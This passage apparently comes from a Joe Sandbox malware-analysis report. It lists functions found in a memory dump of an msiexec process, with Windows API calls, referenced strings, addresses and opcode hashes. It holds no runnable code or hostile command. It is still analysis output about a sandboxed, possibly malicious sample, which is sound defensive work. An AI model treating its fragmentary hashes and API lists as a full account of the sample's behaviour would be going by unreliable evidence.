                                                                                                          • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                          APIs
                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                          • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                          • GetParent.USER32(?), ref: 00409FA5
                                                                                                          • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 2163313125-0
                                                                                                          • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                          • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                          • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                          • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: free$wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3592753638-3916222277
                                                                                                          • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                          • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                          • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                                                          • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040A47B
                                                                                                          • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                          • wcslen.MSVCRT ref: 0040A4BA
                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                          • wcslen.MSVCRT ref: 0040A4E0
                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                                                                          • String ID: %s (%s)$YV@
                                                                                                          • API String ID: 3979103747-598926743
                                                                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                          • API String ID: 2767993716-572158859
                                                                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                          APIs
                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                          • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                          • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                            • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                          • API String ID: 3176057301-2039793938
                                                                                                          • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                          • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                          • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                          • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                          • unable to open database: %s, xrefs: 0042F84E
                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                          • database %s is already in use, xrefs: 0042F6C5
                                                                                                          • database is already attached, xrefs: 0042F721
                                                                                                          • out of memory, xrefs: 0042F865
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpymemset
                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                          APIs
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EB3F
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000), ref: 0040EB5B
                                                                                                          • memcpy.MSVCRT(?,0045A248,00000014), ref: 0040EB80
                                                                                                          • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014), ref: 0040EB94
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC17
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000), ref: 0040EC21
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040EC59
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                          • String ID: ($d
                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                          • Opcode ID: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                          • Opcode Fuzzy Hash: 612b475aad9d1d38ee13413eb206fefa6c5bad09ba85bb1eafc4472043e484bf
                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                          APIs
                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3015003838-0
                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 59245283-0
                                                                                                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                          • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                          • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy
                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                          APIs
                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                          • String ID: 3A
                                                                                                          • API String ID: 3300951397-293699754
                                                                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                          • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                          • String ID: strings
                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0041249C
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                          • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                          • wcscpy.MSVCRT ref: 004125A0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                          • String ID: r!A
                                                                                                          • API String ID: 2791114272-628097481
                                                                                                          • Opcode ID: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                          • Opcode Fuzzy Hash: b6d2b1e59ff3573d6768b080da9da4b7d6a9f96c7a56722062e34d2197ac4208
                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                          • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                          • String ID: BIN
                                                                                                          • API String ID: 1668488027-1015027815
                                                                                                          • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                          • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                          • API String ID: 776488737-1622828088
                                                                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                          • String ID: sysdatetimepick32
                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                          APIs
                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                          • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                          • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                          • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                          • memset.MSVCRT ref: 0041BA3D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcpy$memset
                                                                                                          • String ID: -journal$-wal
                                                                                                          • API String ID: 438689982-2894717839
                                                                                                          • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                          • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2194191848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3975816621-0
                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                          APIs
